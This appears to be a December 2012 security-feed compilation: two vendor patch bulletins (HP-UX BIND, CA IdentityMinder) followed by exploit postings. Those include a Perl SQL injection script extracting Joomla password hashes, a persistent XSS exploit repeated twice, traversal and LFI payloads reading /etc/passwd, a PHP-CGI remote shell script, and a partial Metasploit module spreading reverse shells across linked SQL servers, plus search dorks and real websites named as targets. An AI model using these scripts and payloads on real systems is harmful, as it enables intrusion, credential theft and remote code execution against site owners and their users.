-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03577598
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03577598
Version: 1
HPSBUX02835 SSRT100763 rev.1 - HP-UX Running BIND, Remote Domain Name
Revalidation
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2012-12-18
Last Updated: 2012-12-18
Potential Security Impact: Remote domain name revalidation
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX running
BIND. This vulnerability could be exploited remotely as a domain name
revalidation.
References: CVE-2012-1033
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.31 running BIND 9.7.3 prior to C.9.7.3.1.0
HP-UX B.11.23 and B.11.11 running BIND 9.3 prior to C.9.3.2.13.0
HP-UX B.11.31 running BIND 9.3 prior to C.9.3.2.15.0
HP-UX B.11.11 running BIND 9.2.0 prior to B.11.00.01.004
HP-UX B.11.23 running BIND 9.2.0 without patch PHNE_43369
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2012-1033 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided updated versions of the BIND service to resolve this
vulnerability.
These upgrades are available from the following location
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber
=BIND
BIND 9.7.3 for HP-UX Release
Depot Name
B.11.31 (PA and IA)
HPUX-NameServer_C.9.7.3.1.0_HP-UX_B.11.31_IA_PA.depot
BIND 9.3.2 for HP-UX Release
Depot Name
B.11.11 (PA and IA)
DNSUPGRADE_C.9.3.2.13.0_HP-UX_B.11.11_32_64.depot
B.11.23 (PA and IA)
DNSUPGRADE_C.9.3.2.13.0_HP-UX_B.11.23_IA_PA.depot
B.11.31 (PA and IA)
HPUX-NameServer_C.9.3.2.15.0_HP-UX_B.11.31_IA_PA.depot
MANUAL ACTIONS: Yes - Update
Download and install the software update
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
For BIND 9.7.3
HP-UX B.11.31
==================
NameService.BIND-AUX
NameService.BIND-RUN
action: install revision C.9.7.3.1.0 or subsequent
For BIND 9.3.2
HP-UX B.11.11
==================
BindUpgrade.BIND-UPGRADE
action: install revision C.9.3.2.13.0 or subsequent
HP-UX B.11.23
==================
BindUpgrade.BIND-UPGRADE
BindUpgrade.BIND2-UPGRADE
action: install revision C.9.3.2.13.0 or subsequent
HP-UX B.11.31
==================
NameService.BIND-AUX
NameService.BIND-RUN
action: install revision C.9.3.2.15.0 or subsequent
For BIND 9.2.0
HP-UX B.11.11
==================
BINDv920.INET-SVCS-BIND
action: install revision B.11.00.01.004 or subsequent
HP-UX B.11.23
==================
InternetSrvcs.INETSVCS-INETD
InternetSrvcs.INETSVCS-RUN
InternetSrvcs.INETSVCS2-RUN
action: install patch PHNE_43369 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) - 18 December 2012 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert () hp com
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert () hp com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iEYEARECAAYFAlDTV1gACgkQ4B86/C0qfVmkhQCfW6ez4QuIO/bGpsZB2fIe7pkA
jUEAoI2lRLghpJprnrH6j4lfxjKaXhQG
=3U7b
-----END PGP SIGNATURE-----
↧
HP-UX Running BIND, Remote Domain Name Revalidation
↧
Joomla Component com_movm SQL Injection Exploit (perl)
#Exploit Title: Joomla com_movm SQL Injection exploit
#Dork: inurl:"index.php?option=com_movm"
#Date: 24/12/2012
#Exploit Author: D35m0nd142
#Vendor Homepage: http://www.joomla.org
#Tested on Ubuntu 12.04
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common;
system("clear");
print "***************************************************\n";
print "* Joomla Component com_movm SQL Injection exploit *\n";
print "* Created by D35m0nd142 *\n";
print "****************************************************\n\n";
sleep 1;
print "Enter target --> ";
sleep 1;
chomp(my $target = <STDIN>);
if($target !~ /http:\/\//)
{
$target = "http://$target";
}
$agent = LWP::UserAgent->new();
$host = $target."/index.php?option=com_movm&controller=product&task=product&id=999999'+UNION+ALL+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2Cgroup_concat(username,0x3a,password)+FROM+jos_users--+";
$resp = $agent->request(HTTP::Request->new(GET=>$host));
$content = $resp->content;
if ($content =~/([0-9a-fA-F]{32})/){
print "[+] Password found --> $1\n\n";
sleep 1;
}
else
{
print "No password found .\n";
}
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
↧
↧
Wordpress Themes grou-random-image-widget Full Path Disclosure
-------------------------------------------------------------------------------
Wordpress Themes- grou-random-image-widget Full Path Disclosure vulnerability
-------------------------------------------------------------------------------
#####
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"wp-content/plugins/grou-random-image-widget"
#
# Tested on : Windows 7 , Backtrack 5r3
####
------------------------------
#=> Demos :
http://tjvl.fr/wp-content/plugins/grou-random-image-widget/g-random-img.php
http://www.vivre-musique-classique.fr/wp-content/plugins/grou-random-image-widget/g-random-img.php
http://www.bougeons-dans-la-region.fr/wp-content/plugins/grou-random-image-widget/g-random-img.php
http://www.fel.asso.fr/wp-content/plugins/grou-random-image-widget/g-random-img.php
http://wildearthprograms.org/wp-content/plugins/grou-random-image-widget/g-random-img.php
------------------------------
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
↧
CA IdentityMinder Vulnerabilities
CA20121220-01: Security Notice for CA IdentityMinder
CA Technologies Support is alerting customers to two potential risks in CA
IdentityMinder (formerly known as CA Identity Manager). Two vulnerabilities
exist that can allow a remote attacker to execute arbitrary commands,
manipulate data, or gain elevated access. CA Technologies has issued
patches to address the vulnerability.
The first vulnerability, CVE-2012-6298, allows a remote attacker to execute
arbitrary commands or manipulate data.
The second vulnerability, CVE-2012-6299, allows a remote attacker to gain
elevated access.
Risk Rating
High
Affected Platforms
All
Affected Products
CA IdentityMinder r12.0 CR16 and earlier
CA IdentityMinder r12.5 SP1 thru SP14
CA IdentityMinder r12.6 GA
Non-Affected Products
None (i.e. all supported versions of CA IdentityMinder are vulnerable)
How to determine if the installation is affected
All versions of CA IdentityMinder r12.0, r12.5 prior to SP15, and r12.6 GA
are vulnerable.
You can confirm that patches have been successfully applied by checking the
dates associated with the following IdentityMinder jar files: imsapi6.jar
and ims.jar. The dates on these jars will be set to the dates on which the
patch was applied.
Solution
CA Technologies has issued the following patches to address the
vulnerabilities. Download the appropriate patch(es) and follow the
instructions in the readme.txt file. These patches can be applied to all
operating system platforms.
12.0CR8+ - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/120CR8+.zip
12.5SP1 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP1.zip
12.5SP2 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP2.zip
12.5SP3 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP3.zip
12.5SP4 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP4.zip
12.5SP5 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP5.zip
12.5SP6 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP6.zip
12.5SP7 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP7.zip
12.5SP8 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP8.zip
12.5SP9 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP9.zip
12.5SP10 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP10.zip
12.5SP11 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP11.zip
12.5SP12 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP12.zip
12.5SP13 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP13.zip
12.5SP14 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP14.zip
12.6SP0 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/126GA.zip
Workaround
None
References
CVE-2012-6298 - CA IdentityMinder execute arbitrary commands or manipulate data
CVE-2012-6299 - CA IdentityMinder gain elevated access
CA20121220-01: Security Notice for CA IdentityMinder
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={FBA53B61-3A68-4506-9876-F845F6DD8A93}
Acknowledgement
CVE-2012-6298 - Discovered internally by CA Technologies
CVE-2012-6299 - Discovered internally by CA Technologies
Change History
Version 1.0: Initial Release
If additional information is required, please contact CA Technologies
Support at https://support.ca.com/
If you discover a vulnerability in CA Technologies products, please report
your findings to the CA Technologies Product Vulnerability Response Team.
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Thanks and regards,
Ken Williams, Director
CA Technologies Product Vulnerability Response Team
CA Technologies Business Unit Operations
wilja22 () ca com
Copyright (C) 2012 CA. All Rights Reserved. One CA Plaza, Islandia, N.Y.
11749. All other trademarks, trade names, service marks, and logos
referenced herein belong to their respective companies.
↧
Persistent XSS vulnerability in WP-UserOnline
In 2010 I've disclosed multiple vulnerabilities (Cross-Site Scripting and
Full path disclosure) in WordPress plugin WP-UserOnline
And recently I've disclosed the exploit for persistent XSS vulnerability in WP-UserOnline.
It must be interesting for those who want to test this vulnerability.
Exploit:
http://websecurity.com.ua/uploads/2012/WP-UserOnline.txt
This perl exploit I've developed at 26.04.2010.
As I've wrote earlier, vulnerable are WP-UserOnline 2.62 and previous
versions. After my informing the developer released WP-UserOnline 2.70 (at
07.05.2010). In version 2.70 he fixed XSS, but not Full path disclosure
vulnerabilities.
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Past Vulnerabilities
Welcome 3APA3A! Tells you I had found Cross-Site Scripting and Full path disclosure vulnerabilities in the plugin WP-UserOnline for WordPress. XSS: With a special request to the site can be made XSS attack. For this you need a special way (not the browser) send a GET request to the page http://site/? <script> alert (document.cookie) </ script>. This persistent XSS. Vulnerability appears on page http://site/wp-admin/index.php?page=wp-useronline. Full path WP-UserOnline 2.62 and earlier versions. In the version of WP-UserOnline 2.70 by fixed XSS, but not Full path disclosure vulnerabilities. More information about these vulnerabilities at my site: http://websecurity.com.ua/4177/ Best wishes & Regards, MustLive site administrator http:/ / websecurity.com.ua
Это persistent XSS. Уязвимость проявляется на странице http://site/wp-admin/index.php?page=wp-useronline.
Full path disclosure:
http://site/wp-content/plugins/wp-useronline/admin.php
http://site/wp-content/plugins/wp-useronline/widget.php
http://site/wp-content/plugins/wp-useronline/wp-stats.php
http://site/wp-content/plugins/wp-useronline/wp-useronline.php
http://site/wp-content/plugins/wp-useronline/scb/Widget.php
http://site/wp-content/plugins/wp-useronline/scb/load.php
Уязвимы WP-UserOnline 2.62 и предыдущие версии. В версии WP-UserOnline 2.70 автор исправил XSS, но не Full path disclosure уязвимости.
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4177/
#!/usr/bin/perl
# Exploit for WP-UserOnline
# Copyright (C) MustLive 2010
# http://websecurity.com.ua
# Last update: 26.04.2010
##################################################
# Settings
##################################################
my $agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"; # User Agent
my $url = "http://site"; # URL
my $xss = "/?<script>alert(document.cookie)</script>"; # XSS
##################################################
use IO::Socket;
my ($host,$sock,$content,$response);
$url =~ /http:\/\/(.+)\/?/;
$host = $1;
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80");
if (!$sock) {
print "The Socket: $!\n";
exit();
}
print $sock "GET $xss HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "User-Agent: $agent\n";
print $sock "Connection: close\n";
print $sock "\n\n";
while (<$sock>) {
$content .= $_;
}
print "$url - ";
if ($content =~ /HTTP\/.\..\s+(\d+)/) {
$response = $1;
}
if ($response == 200 or $response == 400) {
print "OK\n";
}
else {
print "Error: $response\n";
}
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
Full path disclosure) in WordPress plugin WP-UserOnline
And recently I've disclosed the exploit for persistent XSS vulnerability in WP-UserOnline.
It must be interesting for those who want to test this vulnerability.
Exploit:
http://websecurity.com.ua/uploads/2012/WP-UserOnline.txt
This perl exploit I've developed at 26.04.2010.
As I've wrote earlier, vulnerable are WP-UserOnline 2.62 and previous
versions. After my informing the developer released WP-UserOnline 2.70 (at
07.05.2010). In version 2.70 he fixed XSS, but not Full path disclosure
vulnerabilities.
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Past Vulnerabilities
Welcome 3APA3A! Tells you I had found Cross-Site Scripting and Full path disclosure vulnerabilities in the plugin WP-UserOnline for WordPress. XSS: With a special request to the site can be made XSS attack. For this you need a special way (not the browser) send a GET request to the page http://site/? <script> alert (document.cookie) </ script>. This persistent XSS. Vulnerability appears on page http://site/wp-admin/index.php?page=wp-useronline. Full path WP-UserOnline 2.62 and earlier versions. In the version of WP-UserOnline 2.70 by fixed XSS, but not Full path disclosure vulnerabilities. More information about these vulnerabilities at my site: http://websecurity.com.ua/4177/ Best wishes & Regards, MustLive site administrator http:/ / websecurity.com.ua
Это persistent XSS. Уязвимость проявляется на странице http://site/wp-admin/index.php?page=wp-useronline.
Full path disclosure:
http://site/wp-content/plugins/wp-useronline/admin.php
http://site/wp-content/plugins/wp-useronline/widget.php
http://site/wp-content/plugins/wp-useronline/wp-stats.php
http://site/wp-content/plugins/wp-useronline/wp-useronline.php
http://site/wp-content/plugins/wp-useronline/scb/Widget.php
http://site/wp-content/plugins/wp-useronline/scb/load.php
Уязвимы WP-UserOnline 2.62 и предыдущие версии. В версии WP-UserOnline 2.70 автор исправил XSS, но не Full path disclosure уязвимости.
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4177/
#!/usr/bin/perl
# Exploit for WP-UserOnline
# Copyright (C) MustLive 2010
# http://websecurity.com.ua
# Last update: 26.04.2010
##################################################
# Settings
##################################################
my $agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"; # User Agent
my $url = "http://site"; # URL
my $xss = "/?<script>alert(document.cookie)</script>"; # XSS
##################################################
use IO::Socket;
my ($host,$sock,$content,$response);
$url =~ /http:\/\/(.+)\/?/;
$host = $1;
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80");
if (!$sock) {
print "The Socket: $!\n";
exit();
}
print $sock "GET $xss HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "User-Agent: $agent\n";
print $sock "Connection: close\n";
print $sock "\n\n";
while (<$sock>) {
$content .= $_;
}
print "$url - ";
if ($content =~ /HTTP\/.\..\s+(\d+)/) {
$response = $1;
}
if ($response == 200 or $response == 400) {
print "OK\n";
}
else {
print "Error: $response\n";
}
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
↧
↧
Netransfers 2.1 XSS / LFI / Traversal
Exploit Title: Netransfers V2.1 Multiple vulnerability
# Date: 19.12.2012
# Exploit Author: d3b4g
# Vendor Homepage: http://marioemoreno.com/netransfers-demo/
# Tested on:Windows 7
# Blog: d3b4g.me
---------------------------------------------------------------------
[1]Directory Traversal Vulnerability
------------------------------------
http://localhost/[path]/index.php?lang=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
[2] Localfile Inclusion
-------------------
http://localhost/[path]/search.php?lang= [evil site]
[3] XSS
---------------
http://localhost/[path]/tours_step2.php?lang=espanol%27%22()&%%3CScRiPt%20%3Eprompt(xss)%3C/ScRiPt%3E
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
↧
PHP-CGI Argument Injection Remote Code Execution
#!/usr/bin/python
import requests
import sys
print """
CVE-2012-1823 PHP-CGI Arguement Injection Remote Code Execution
This exploit abuses an arguement injection in the PHP-CGI wrapper
to execute code as the PHP user/webserver user.
Feel free to give me abuse about this <3
- infodox | insecurety.net | @info_dox
"""
if len(sys.argv) != 2:
print "Usage: ./cve-2012-1823.py <target>"
sys.exit(0)
target = sys.argv[1]
url = """http://""" + target + """/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"""
lol = """<?php system('"""
lol2 = """');die(); ?>"""
print "[+] Connecting and spawning a shell..."
while True:
try:
bobcat = raw_input("%s:~$ " %(target))
lulz = lol + bobcat + lol2
hax = requests.post(url, lulz)
print hax.text
except KeyboardInterrupt:
print "\n[-] Quitting"
sys.exit(1)
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
↧
Metasploit: Microsoft SQL Server Database Link Crawling Command Execution Microsoft SQL Server Database Link Crawling Command Execution
#
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/exploit/mssql_commands'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::MSSQL
include Msf::Auxiliary::Report
include Msf::Exploit::CmdStagerVBS
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server Database Link Crawling Command Execution',
'Description' => %q{
This module can be used to crawl MS SQL Server database links and deploy
Metasploit payloads through links configured with sysadmin privileges using a
valid SQL Server Login.
If you are attempting to obtain multiple reverse shells using this module we
recommend setting the "DisablePayloadHandler" advanced option to "true", and setting
up a multi/handler to run in the background as a job to support multiple incoming
shells.
If you are interested in deploying payloads to spefic servers this module also
supports that functionality via the "DEPLOYLIST" option.
Currently, the module is capable of delivering payloads to both 32bit and 64bit
Windows systems via powershell memory injection methods based on Matthew Graeber's
work. As a result, the target server must have powershell installed. By default,
all of the crawl information is saved to a CSV formatted log file and MSF loot so
that the tool can also be used for auditing without deploying payloads.
},
'Author' =>
[
'Antti Rantasaari <antti.rantasaari[at]netspi.com>',
'Scott Sutherland "nullbind" <scott.sutherland[at]netspi.com>'
],
'Platform' => [ 'win' ],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012'],
['URL','http://msdn.microsoft.com/en-us/library/ms188279.aspx'],
['URL','http://www.exploit-monday.com/2011_10_16_archive.html']
],
'Platform' => 'win',
'DisclosureDate' => 'Jan 1 2000',
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0
))
register_options(
[
OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', 'false']),
OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy to']),
OptString.new('PASSWORD', [true, 'The password for the specified username'])
], self.class)
register_advanced_options(
[
OptString.new('POWERSHELL_PATH', [true, 'Path to powershell.exe', "C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe"])
], self.class)
end
def exploit
# Display start time
time1 = Time.new
print_status("-------------------------------------------------")
print_status("Start time : #{time1.inspect}")
print_status("-------------------------------------------------")
# Check if credentials are correct
print_status("Attempting to connect to SQL Server at #{rhost}:#{rport}...")
if (not mssql_login_datastore)
print_error("Invalid SQL Server credentials")
print_status("-------------------------------------------------")
return
end
# Define master array to keep track of enumerated database information
masterList = Array.new
masterList[0] = Hash.new # Define new hash
masterList[0]["name"] = "" # Name of the current database server
masterList[0]["db_link"] = "" # Name of the linked database server
masterList[0]["db_user"] = "" # User configured on the database server link
masterList[0]["db_sysadmin"] = "" # Specifies if the database user configured for the link has sysadmin privileges
masterList[0]["db_version"] = "" # Database version of the linked database server
masterList[0]["db_os"] = "" # OS of the linked database server
masterList[0]["path"] = [[]] # Link path used during crawl - all possible link paths stored
masterList[0]["done"] = 0 # Used to determine if linked need to be crawled
shelled = Array.new # keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system
# Setup query for gathering information from database servers
versionQuery = "select @@servername,system_user,is_srvrolemember('sysadmin'),(REPLACE(REPLACE(REPLACE\
(ltrim((select REPLACE((Left(@@Version,CHARINDEX('-',@@version)-1)),'Microsoft','')+ rtrim(CONVERT\
(char(30), SERVERPROPERTY('Edition'))) +' '+ RTRIM(CONVERT(char(20), SERVERPROPERTY('ProductLevel')))+\
CHAR(10))), CHAR(10), ''), CHAR(13), ''), CHAR(9), '')) as version, RIGHT(@@version, LEN(@@version)- 3 \
-charindex (' ON ',@@VERSION)) as osver,is_srvrolemember('sysadmin'),(select count(srvname) from \
master..sysservers where dataaccess=1 and srvname!=@@servername and srvproduct = 'SQL Server')as linkcount"
# Create loot table to store configuration information from crawled database server links
linked_server_table = Rex::Ui::Text::Table.new(
'Header' => 'Linked Server Table',
'Ident' => 1,
'Columns' => ['db_server', 'db_version', 'db_os', 'link_server', 'link_user', 'link_privilege', 'link_version', 'link_os','link_state']
)
save_loot = ""
# Start crawling through linked database servers
while masterList.any? {|f| f["done"] == 0}
# Find the first DB server that has not been crawled (not marked as done)
server = masterList.detect {|f| f["done"] == 0}
# Get configuration information from the database server
sql = query_builder(server["path"].first,"",0,versionQuery)
result = mssql_query(sql, false) if mssql_login_datastore
parse_results = result[:rows]
parse_results.each { |s|
server["name"] = s[0]
server["db_user"] = s[1]
server["db_sysadmin"] = s[5]
server["db_version"] = s[3]
server["db_os"] = s[4]
server["numlinks"] = s[6]
}
if masterList.length == 1
print_good("Successfully connected to #{server["name"]}")
if datastore['VERBOSE'] == true
show_configs(server["name"],parse_results,true)
elsif server["db_sysadmin"] == 1
print_good("Sysadmin on #{server["name"]}")
end
end
if server["db_sysadmin"] == 1
enable_xp_cmdshell(server["path"].first,server["name"],shelled)
end
# If links were found, determine if they can be connected to and add to crawl list
if (server["numlinks"] > 0)
# Enable loot
save_loot = "yes"
# Select a list of the linked database servers that exist on the current database server
print_status("")
print_status("-------------------------------------------------")
print_status("Crawling links on #{server["name"]}...")
# Display number db server links
print_status("Links found: #{server["numlinks"]}")
print_status("-------------------------------------------------")
execute = "select srvname from master..sysservers where dataaccess=1 and srvname!=@@servername and srvproduct = 'SQL Server'"
sql = query_builder(server["path"].first,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
result[:rows].each {|name|
name.each {|name|
# Check if link works and if sysadmin permissions - temp array to save orig server[path]
temppath = Array.new
temppath = server["path"].first.dup
temppath << name
# Get configuration information from the linked server
sql = query_builder(temppath,"",0,versionQuery)
result = mssql_query(sql, false) if mssql_login_datastore
# Add newly aquired db servers to the masterlist, but don't add them if the link is broken or already exists
if result[:errors].empty? and result[:rows] != nil then
# Assign db query results to variables for hash
parse_results = result[:rows]
# Add link server information to loot
link_status = 'up'
write_to_report(name,server,parse_results,linked_server_table,link_status)
# Display link server information in verbose mode
if datastore['VERBOSE'] == true
show_configs(name,parse_results)
print_status(" o Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}")
else
if parse_results[0][5] == 1
print_good("Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} (Sysadmin!)")
else
print_status("Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}")
end
end
# Add link to masterlist hash
unless masterList.any? {|f| f["name"] == name}
masterList << add_host(name,server["path"].first,parse_results)
else
(0..masterList.length-1).each do |x|
if masterList[x]["name"] == name
masterList[x]["path"] << server["path"].first.dup
masterList[x]["path"].last << name
unless shelled.include?(name)
if parse_results[0][2]==1
enable_xp_cmdshell(masterList[x]["path"].last.dup,name,shelled)
end
end
else
break
end
end
end
else
# Add to report
linked_server_table << [server["name"],server["db_version"],server["db_os"],name,'NA','NA','NA','NA','Connection Failed']
# Display status to user
if datastore['VERBOSE'] == true
print_status(" ")
print_error("Linked Server: #{name} ")
print_error(" o Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed")
print_status(" Failure could be due to:")
print_status(" - A dead server")
print_status(" - Bad credentials")
print_status(" - Nested open queries through SQL 2000")
else
print_error("Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed")
end
end
}
}
end
# Set server to "crawled"
server["done"]=1
end
print_status("-------------------------------------------------")
# Setup table for loot
this_service = nil
if framework.db and framework.db.active
this_service = report_service(
:host => rhost,
:port => rport,
:name => 'mssql',
:proto => 'tcp'
)
end
# Display end time
time1 = Time.new
print_status("End time : #{time1.inspect}")
print_status("-------------------------------------------------")
# Write log to loot / file
if (save_loot=="yes")
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_linked_servers.csv"
path = store_loot("crawled_links", "text/plain", datastore['RHOST'], linked_server_table.to_csv, filename, "Linked servers",this_service)
print_status("Results have been saved to: #{path}")
end
end
# ---------------------------------------------------------------------
# Method that builds nested openquery statements using during crawling
# ---------------------------------------------------------------------
def query_builder(path,sql,ticks,execute)
# Temp used to maintain the original masterList[x]["path"]
temp = Array.new
